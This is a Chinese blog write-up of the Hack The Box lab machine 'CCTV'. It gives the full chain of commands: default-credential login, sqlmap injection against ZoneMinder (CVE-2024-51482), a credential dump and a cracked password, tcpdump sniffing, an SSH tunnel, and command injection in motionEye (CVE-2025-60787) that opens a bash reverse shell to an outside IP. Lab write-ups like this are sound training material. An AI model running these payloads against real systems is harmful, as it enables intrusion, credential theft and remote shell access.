【渗透测试】HTB Season 10 CCTV 全过程WP

CCTV

信息收集

image-20260312115132632

admin/admin登录

image-20260312130157755

zoneminder 是v1.37.63

CVE-2024-51482

https://github.com/Gh0s7Ops/CVE-2024-51482-Multi-Stage-Surveillance-System-Exploit

sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=r0lvc55s40cck2d3ofpj32msj2" \
    -p tid --dbms=mysql --batch

image-20260312130919849

我们获取用户的密码

sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=r0lvc55s40cck2d3ofpj32msj2" \
    -p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump

破解mark的密码

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
mark:opensesame

登录ssh

ssh mark@10.129.253.78

image-20260312131705119

横向移动

上传linpeas.sh进行内网横向移动

可以看到有个计划任务

image-20260312133009487

可以看到他会使用用户sa_mark进行登录

那我们可以去抓包

/usr/bin/tcpdump -i any -A

权限提升

image-20260312135910122

建立一个隧道转发

ssh -L 8765:127.0.0.1:8765 mark@10.129.253.78

image-20260312140306900

image-20260312140431242

motionEye Version 0.43.1b4

CVE-2025-60787

开启图片输出:
curl "http://127.0.0.1:7999/1/1config/set?picture_output=on"

image-20260312141442160

反弹shell
http://127.0.0.1:7999/1/config/set?picture_filename=$(bash -c 'bash -i >& /dev/tcp/10.10.16.14/4444 0>&1')

curl "http://127.0.0.1:7999/1/config/set?picture_filename=%24%28bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.14%2F4444%200%3E%261%27%29"

发先没反弹过来

还要触发

motion服务

curl "http://127.0.0.1:7999/1/config/set?emulate_motion=on"

image-20260312142328062

posted @ 2026-03-12 14:28  dynasty_chenzi  阅读(598)  评论(0)    收藏  举报
返回顶端